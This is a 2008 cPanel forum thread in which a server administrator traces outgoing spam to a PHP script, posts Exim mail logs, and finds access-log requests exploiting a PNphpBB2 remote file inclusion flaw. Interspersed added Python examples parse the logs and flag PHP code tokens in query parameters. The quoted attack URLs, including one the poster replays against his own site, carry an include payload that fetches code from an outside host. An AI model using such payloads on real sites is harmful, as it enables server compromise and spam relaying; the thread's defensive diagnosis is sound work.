The Community Forums

Interact with an entire community of cPanel & WHM users!

my mail system is being exploited

Discussion in 'E-mail Discussions' started by dukejustice, Mar 7, 2008.

  1. dukejustice

    dukejustice Registered

    Joined:
    Mar 6, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Hi.

    My mail system is being exploited to send spam.

    here is a typical header of a spam sent:
    1JXcwB-0005Ar-CJ-H
    nobody 99 99
    <nobody@machinenumber.mydomain.tld>
    1204897719 0
    -ident nobody
    -received_protocol local
    -body_linecount 49
    -max_received_linelength 97
    -auth_id nobody
    -auth_sender nobody@machinenumber.mydomain.tld
    -allow_unqualified_recipient
    -allow_unqualified_sender
    -deliver_firsttime
    -local
    XX


    As of now, only smtp auth'd people (3 only) send via this server. Plus the php mailer.

    But with the volume that is going out, there must be an exploit of some kind.

    There must be somewhere I can look (logs) to find my information. Where is it? What is it named?

    I need help. Please. My service provider doesn't seem to know about this situation and always tells me I am on VPS and that it's my problem.

    Any help?

    Marc
     
  2. dukejustice

    dukejustice Registered

    Joined:
    Mar 6, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    I found in /var/log/exim_mainlog this:

    2008-03-07 08:05:46 1JXdCi-0004Zx-Rm ** root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: retry timeout exceeded
    2008-03-07 08:05:46 1JXdCi-0004Za-98 Completed
    2008-03-07 08:05:46 1JXdCi-0004Zx-Rm root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: error ignored
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf User 0 set for local_delivery transport is on the never_users list
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf == root@myserver.mydomain.tld <nobody@myserver.mydomain.tld> R=localuser T=local_delivery defer (-29): User 0 set for local_delivery transport is on the never_users list
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf ** root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: retry timeout exceeded
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf root@myserver.mydomain.tld <nobody@myserver.mydomain.tld>: error ignored
    2008-03-07 08:05:46 1JXdCk-0004aX-OZ <= nobody@myserver.mydomain.tld U=nobody P=local S=1942
    2008-03-07 08:05:46 1JXdCh-0004ZN-Kf Completed
    2008-03-07 08:05:46 1JXdCi-0004Zp-II Completed
    2008-03-07 08:05:46 1JXdCi-0004Zx-Rm Completed
    2008-03-07 08:05:46 1JXdCk-0004aT-Iy <= nobody@myserver.mydomain.tld U=nobody P=local S=1942
    2008-03-07 08:05:47 1JXdCl-0004an-1j <= nobody@myserver.mydomain.tld U=nobody P=local S=1944
    2008-03-07 08:05:47 1JXdCi-0004Zu-PC => ciani79@hotmail.com R=lookuphost T=remote_smtp H=mx3.hotmail.com [65.54.245.72]
    2008-03-07 08:05:47 1JXdCi-0004Zu-PC Completed
    2008-03-07 08:05:47 1JXdCj-0004a9-LU => dave@daveconte.com R=lookuphost T=remote_smtp H=smtp.where.secureserver.net [208.109.80.149]
    2008-03-07 08:05:47 1JXdCj-0004a9-LU Completed
    2008-03-07 08:05:47 1JXdCl-0004at-8M <= nobody@myserver.mydomain.tld U=nobody P=local S=1952
    2008-03-07 08:05:47 1JXdCj-0004aC-Pd => cibbs04@aol.com R=lookuphost T=remote_smtp H=mailin-02.mx.aol.com [64.12.137.89]
    2008-03-07 08:05:47 1JXdCk-0004aL-5D Remote host server30.appriver.com [69.20.116.115] closed connection in response to initial connection
    2008-03-07 08:05:47 1JXdCj-0004aC-Pd Completed
    2008-03-07 08:05:47 1JXdCl-0004ar-9x <= nobody@myserver.mydomain.tld U=nobody P=local S=1934
    2008-03-07 08:05:47 1JXdCl-0004ax-Dh <= nobody@myserver.mydomain.tld U=nobody P=local S=1948
    2008-03-07 08:05:47 1JXdCk-0004aV-EW => cin37@hotmail.com R=lookuphost T=remote_smtp H=mx2.hotmail.com [65.54.245.40]
    2008-03-07 08:05:47 1JXdCk-0004aV-EW Completed
    2008-03-07 08:05:47 1JXdCk-0004aX-OZ ** cin_tom@hotmail.com R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<cin_tom@hotmail.com>: host mx4.hotmail.com [65.54.244.232]: 550 Requested action not taken: mailbox unavailable
    2008-03-07 08:05:47 1JXdCi-0004ZY-Ct => dave@albertbros.com R=lookuphost T=remote_smtp H=mail.albertbros.com [75.145.248.105]
    2008-03-07 08:05:47 1JXdCi-0004ZY-Ct Completed
    2008-03-07 08:05:47 1JXdCl-0004b3-Nk <= nobody@myserver.mydomain.tld U=nobody P=local S=1958
    2008-03-07 08:05:47 1JXdCl-0004an-1j ** cinbad122968@aol.com R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<cinbad122968@aol.com>: host mailin-02.mx.aol.com [64.12.137.89]: 550 We would love to have gotten this email to cinbad122968@aim.com. But, your recipient never logged onto their free AIM Mail account. Please contact them and let them know that they're missing out on all the super features offered by AIM Mail. And by the way, they're also missing out on your email. Thanks.


    but this in no way tells me where these are coming from.

    Marc
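    The spool header in the first post (`-received_protocol local`, `-auth_id nobody`) and the `<= nobody@... U=nobody P=local` lines in the exim_mainlog above say the same thing: the messages were handed to Exim locally by the web server user, not over authenticated SMTP. The script below is an added example (not from any poster in this thread) that parses mainlog arrival, delivery and failure lines, groups arrivals by how they entered the queue, and flags local users submitting above a threshold. The log text is constructed in the format quoted above; the authenticated `P=esmtpa A=dovecot_login:alice` line and the `example.tld` sender are invented for contrast.

```python
import re
from collections import Counter

# Constructed sample in exim_mainlog format, modelled on the lines quoted in the
# thread. The ESMTPA (authenticated) arrival is invented to show the contrast.
SAMPLE_LOG = """\
2008-03-07 08:05:46 1JXdCk-0004aX-OZ <= nobody@myserver.mydomain.tld U=nobody P=local S=1942
2008-03-07 08:05:46 1JXdCk-0004aT-Iy <= nobody@myserver.mydomain.tld U=nobody P=local S=1942
2008-03-07 08:05:47 1JXdCl-0004an-1j <= nobody@myserver.mydomain.tld U=nobody P=local S=1944
2008-03-07 08:05:47 1JXdCi-0004Zu-PC => ciani79@hotmail.com R=lookuphost T=remote_smtp H=mx3.hotmail.com [65.54.245.72]
2008-03-07 08:05:47 1JXdCi-0004Zu-PC Completed
2008-03-07 08:05:48 1JXdCm-0004b9-Qa <= alice@example.tld H=(client) [192.0.2.10] P=esmtpa A=dovecot_login:alice S=2310
2008-03-07 08:05:48 1JXdCk-0004aX-OZ ** cin_tom@hotmail.com R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<cin_tom@hotmail.com>: 550 mailbox unavailable
"""

# "<=" arrival, "=>" delivery, "**" permanent failure, "==" deferral.
# Lines without one of these flags (e.g. "Completed") are ignored.
EVENT_RE = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<id>\S+) '
    r'(?P<flag><=|=>|\*\*|==) (?P<addr>\S+) ?(?P<tail>.*)$')
# Exim's single-letter fields: U=user P=protocol A=auth H=host S=size ...
KV_RE = re.compile(r'\b([A-Z])=(\S+)')


def parse_log(text):
    """Return one dict per message event found in the log text."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        events.append({
            'ts': m.group('ts'),
            'id': m.group('id'),
            'flag': m.group('flag'),
            'addr': m.group('addr'),
            'fields': dict(KV_RE.findall(m.group('tail'))),
        })
    return events


def origin_key(fields):
    """Classify how a message entered the queue from its '<=' fields."""
    if fields.get('P') == 'local':
        return 'local:' + fields.get('U', '?')    # submitted on the box itself
    if 'A' in fields:
        return 'auth:' + fields['A']               # SMTP AUTH login
    return 'remote:' + fields.get('P', '?')        # unauthenticated SMTP


def arrivals_by_origin(events):
    """Count '<=' arrivals per origin (local user, auth login, or protocol)."""
    return Counter(origin_key(e['fields']) for e in events if e['flag'] == '<=')


def failures_by_origin(events):
    """Map '**' bounces back to the origin of the message that caused them."""
    origins = {e['id']: origin_key(e['fields']) for e in events if e['flag'] == '<='}
    return Counter(origins.get(e['id'], 'unknown')
                   for e in events if e['flag'] == '**')


def flag_local_users(events, threshold):
    """Local users whose submissions reach the threshold, sorted by name."""
    counts = Counter(e['fields'].get('U') for e in events
                     if e['flag'] == '<=' and e['fields'].get('P') == 'local')
    return sorted(u for u, n in counts.items() if n >= threshold)


if __name__ == '__main__':
    ev = parse_log(SAMPLE_LOG)
    for origin, n in arrivals_by_origin(ev).most_common():
        print(f'{n:6d}  {origin}')
    print('bounces by origin:', dict(failures_by_origin(ev)))
    print('local users at/over threshold:', flag_local_users(ev, 3))
```

    Run against the real `/var/log/exim_mainlog`, a large `local:nobody` count next to small `auth:` counts answers the "where is this coming from" question: the sender is a script running as the web server user, so the next place to look is the web server's access log rather than SMTP AUTH rate limits.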
     
  3. dukejustice

    dukejustice Registered

    Joined:
    Mar 6, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    follow up:
    Ratelimit: incoming SMTP connections that do not send QUIT, have recently matched an RBL, or have attacked the server. is checked

    Add sender rates to the mail log is checked

    no rate seems to be enforced unless this problem is caused by a spammer sending quits.

    Still in the dark.

    Marc
     
  4. s.a.

    s.a. Active Member
    PartnerNOC

    Joined:
    Aug 16, 2007
    Messages:
    35
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Toronto, Canada
    Looks like it's your phpmailer.
    Check the access_log for the domain and see who's using the script.
     
  5. dukejustice

    dukejustice Registered

    Joined:
    Mar 6, 2008
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Just did...

    I found out many of these

    127.0.0.1 - - [07/Mar/2008:09:38:13 -0600] "GET /?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php%3fp=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5ba%5d),exit.%2527&a=http://www.geocities.com/d_e_d_d000000f%3f HTTP/1.1" 200 3473

    But that doesn't tell me anything about my problem, except telling me I have a problem.

    I did go to http://www.geocities.com/d_e_d_d_0000000000/id.txt indicated in the url and there is a php script over there.

    now, I did try that url:
    http://www.mydomain.tld/?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php%253fp=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%252527.include($_GET%255ba%255d),exit.%252527&a=http://www.geocities.com/d_e_d_d_i.3721/id.txt%253f%253f

    and it gives me the page it should give me...

    So there must be some kind of alias somewhere in some table of http that executes code with this command while showing the webpage.

    Any more help with this?

    Regards.

    Marc
     
    #5 dukejustice, Mar 7, 2008
    Last edited by a moderator: Mar 7, 2008
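    The access_log line quoted in the post above is what s.a.'s suggestion turns up: a `highlight` parameter carrying double-encoded PHP (`%2527` decodes to `%27` and then to a quote, `%5ba%5d` to `[a]`) and an `a` parameter pointing at a remote URL, which is the shape of a remote file inclusion attempt against an old PNphpBB2 `viewtopic.php`. The script below is an added example, not code from anyone in this thread, that parses combined-format access_log lines, percent-decodes each query parameter until it stops changing, and flags parameters containing PHP code tokens (high) or a remote URL (review). The first sample line is the one from the post; the other two lines and their IPs are constructed.

```python
import re
from urllib.parse import unquote

# First line is the request quoted in the thread; the next two are constructed
# (a normal viewtopic request and a legitimate redirect that carries a URL).
SAMPLE_ACCESS_LOG = [
    '127.0.0.1 - - [07/Mar/2008:09:38:13 -0600] "GET /?name=PNphpBB2&file=viewtopic'
    '&t=8/viewtopic.php%3fp=15&sid=be4c914eb746ac7c96beea717fdfc692/'
    '&highlight=%2527.include($_GET%5ba%5d),exit.%2527'
    '&a=http://www.geocities.com/d_e_d_d000000f%3f HTTP/1.1" 200 3473',
    '198.51.100.7 - - [07/Mar/2008:09:40:01 -0600] '
    '"GET /?name=PNphpBB2&file=viewtopic&t=8 HTTP/1.1" 200 5120',
    '198.51.100.8 - - [07/Mar/2008:09:41:30 -0600] '
    '"GET /?name=Search&redirect=http://www.example.com/page HTTP/1.1" 302 0',
]

# Apache combined/common log: ip ident user [time] "METHOD target proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Lowercase tokens that should never appear in a legitimate query value.
CODE_TOKENS = ('include(', 'require(', 'eval(', '$_get', '$_post',
               '$_request', 'system(')
REMOTE_URL_RE = re.compile(r'(?:https?|ftp)://')


def decode_fully(s, limit=5):
    """Percent-decode until stable so %2527 -> %27 -> ' is seen as a quote."""
    for _ in range(limit):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def query_params(target):
    """Split the request target's query string into decoded (name, value) pairs."""
    _, _, query = target.partition('?')
    params = []
    for part in query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        params.append((decode_fully(name), decode_fully(value)))
    return params


def classify(target):
    """Return (severity, parameter, reason) findings for one request target."""
    findings = []
    for name, value in query_params(target):
        low = value.lower()
        if any(tok in low for tok in CODE_TOKENS):
            findings.append(('high', name, 'PHP code in parameter value'))
        if REMOTE_URL_RE.match(low):
            findings.append(('review', name, 'remote URL in parameter value'))
    return findings


def scan(lines):
    """Return one hit per log line that has findings, with the worst severity."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        findings = classify(m.group('target'))
        if not findings:
            continue
        severity = 'high' if any(f[0] == 'high' for f in findings) else 'review'
        hits.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                     'status': m.group('status'), 'severity': severity,
                     'findings': findings})
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_ACCESS_LOG):
        print(hit['severity'], hit['ip'], hit['ts'], hit['status'])
        for sev, name, reason in hit['findings']:
            print(f'    [{sev}] {name}: {reason}')
```

    A remote URL in a parameter on its own is only worth a look (redirect and callback parameters carry them legitimately), which is why it is separated from the code-token finding; the combination of both on one request with a 200 response, as in the quoted line, is the case to treat as a compromise. Detection in the access log is after the fact: the script that evaluates the `highlight` parameter still needs to be removed or updated, and PHP's `allow_url_include`/`allow_url_fopen` settings are the usual mitigation for this class of bug.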
  6. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,475
    Likes Received:
    202
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Yep, lock that account down, it's been compromised. Probably your server as well by the sound of it. Don't wait, go find help.

    My 2
     